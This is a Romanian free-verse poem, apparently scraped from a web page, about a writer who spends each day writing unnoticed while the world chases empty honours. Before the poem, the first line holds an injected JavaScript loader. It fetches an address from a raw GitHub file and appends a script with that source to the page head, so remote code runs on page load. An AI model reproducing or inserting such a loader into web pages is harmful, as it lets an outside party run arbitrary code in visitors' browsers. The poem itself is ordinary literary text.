;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Azi n-ai făcut nimic deosebit,
ai scris aşa cum ai făcut tot timpul
trecut prin tine ca printr-o clepsidră nisipul,
nimeni n-a sesizat pînă acum că ai trăit
aşa cum alţii refuză să trăiască aşa,
li se pare inutil să pierzi timpul deşi de cele mai multe ori îl pierd
ca şi cum ar fi clădit ziduri înalte în jurul zidului chinezesc,
nimic deosebit în această observaţie
la care nimeni nu s-a gîndit,
ce rost are să te gîndeşti la ceva la care nimeni nu se gîndeşte,
ieşi pur şi simplu din casă şi cazi odată cu umbra,
nimeni nu te ridică,
nimeni nu şi-a dat seama că ai existat pînă acum
şi ai scris aşa cum ai făcut tot timpul
care s-a scurs prin tine ca printr-o lentilă de ochelari
imaginile pe care nimeni nu le-a văzut
aşa cum le-ai văzut tu,
nici mîine n-o să faci nimic,
o să scrii aşa cum ai făcut şi ieri, cum ai făcut şi azi,
fără să întorci lumea pe dos aşa cum vezi că o întorc alţii
fără să facă nici un efort,
ci pur şi simplu se distrează mereu la marginea lumii
de parcă ar fi în mijlocul ei,
tu scrii toate astea şi nici nu crezi că vreodată cineva
se va sinchisi să se uite peste zilele tale
aşa cum fac unii critici literari cînd scot în lume ediţii critice definitive
din scriitori care au scris toată viaţa
fără să-i observe nimeni,
fără să ştie că au existat,
lăsînd totul în seama obiectelor care le-au aparţinut
şi cred că acestea spun totul
aşa cum nisipul din clepsidra mereu răsturnată
s-ar aduna într-un deşert liniştit
pe care-l va spulbera vîntul în ochii celor ce nu ştiu
că într-o bibliotecă trebuie să-ţi pui ochelarii pe ochi
să poţi vedea fiecare respiraţie a celui
care a aşezat acolo fir de nisip cu fir de nisip
din viaţa lui,
să nu-ţi scape nimic sau să fii strivit de rafturile
ca nişte cimitire prin care au crescut bălăriile,
azi nu ai făcut nimic, nimic din ceea ce alţii cred că fac
şi habar n-au ce-au făcut, dar se laudă
că au haine festive în aulele academiilor
prin care şopteşte un cîntec Eccleziastul,
mereu acelaşi cîntec
pe care toţi cred că l-au auzit, dar au rămas fuduli de urechi
în care le intră vorbele ca nişte clinchete de arginţi
în mîna lui Iuda,
azi ai lenevit scriind iarăşi nimicuri după nimicuri
aşezîndu-te în raft ca într-un pat din care te trezeşti
mîine dimineaţă tras de o mînă
care te răsfoieşte ca o şoaptă ieşită din aceeaşi gură
a deşărtăciunii,
poate mîine, îţi spui, o să faci şi tu ceva folositor,
o să ieşi în oraş, o să cumperi tigăi de inox
de la nişte escroci, o să joci table într-un parc
cu necunoscuţii lîngă care ai trăit o viaţă întreagă
şi care habar n-au avut că tu ai tras chiulul toată viaţa
în camera ta în care ai scris cuvînt cu cuvînt
pînă camera ta a devenit un deşert din care ai fost
scos afară, în gura lumii care mursecă orice
numai cuvinte nu, ci doar cocoloaşe de vorbe
pe care le rostogolesc peste nişte popice
ivite la întîmplare în cale,
sau o să stai într-o cafenea şi vei osteni pînă la epuizare,
mîine la fel, tot aşa pînă
cînd lumea te va observa şi toţi îţi vor umple pieptul de medalii,
care te vor băga în pămînt cu toată gloria
de care doar ei se mîndresc,
nu te vei mai întoarce acasă,
acolo e pustiu ca într-o bibliotecă plină de inutilităţi,
vei colinda lumea,
îţi vei gusta gloria în fiecare biscuit
pe care-l vei primi,
cetăţean de onoare al unor priviri sisifice
care se surpă în sine, ridicîndu-se cu greu
ca un beţiv din propriu-i trup
ciuruit ca un gong din spatele unei scene
în care tu joci,
tu eşti spectator,
zi de zi,
tren gol plin de ecoul unor hohote de rîs
de pe altă lume.